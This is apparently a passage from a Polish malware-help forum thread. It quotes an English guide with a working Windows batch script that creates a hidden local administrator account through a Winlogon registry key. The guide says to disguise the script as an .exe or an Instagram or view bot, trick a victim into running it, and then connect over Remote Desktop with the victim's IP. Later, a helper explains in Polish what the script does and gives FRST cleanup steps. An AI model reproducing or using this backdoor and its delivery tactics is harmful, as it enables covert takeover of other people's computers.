cd
cls
REM “WhatEverYouWantNameIt”
REM ------------------------------ @echo off
set /p user=PLS INSERT YOUR USER :
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v %user% /t REG_DWORD /d 0
pause
it’s done! save it as the batch file (.bat)
named whatever you want,
ok after get him IP address you need to give them this batch file!
for that, you can change it to .exe file or put this Batch in a program file, you can put in an instagrambot or viewbot or anything, and name it to program name! and told the victim to open it first! if he/she click on it make a HiddenUser on the Computer
and what you gonna do is connect him with Remote access app(you can find it on windows search bar) and IP address you got before!
Te komendy z pliku .bat tworzą w systemie użytkownika z hasłem, które podajesz w trakcie jego działania, a następnie dodają go do grupy “administratorzy” i ukrywają z ekranu logowania.
Tak działało to w XP, gdzie sam to robiłem, ale czy to działa tak w Windows 10, to nie wiem. Mówię oczywiście o ukrywaniu konta.
Samo konto, które zakładasz jest lokalne, bez znajomości tych danych jednak nikt na nie się nie zaloguje. Nawet znając IP.
Oczywiście jak ktoś poda komuś innemu te dane i jednocześnie zainstaluje sobie jakieś VNC, to sprawa się komplikuje, no ale…
Przejrzałem logi.
Spróbujmy zresetować niektóre ustawienia i troszkę oczyścić system
Pobierz ten plik i zapisz w katalogu z FRST, tzn. C:\Users\popro\Downloads fixlist.txt (3,2 KB) “Plik naprawczy został utworzony tylko dla Ciebie, nie należy go stosować na innym komputerze”
Uruchom FRST i kliknij Napraw, program wyłączy niepotrzebne procesy, zrobi Punkt Przywracania i zacznie pracę.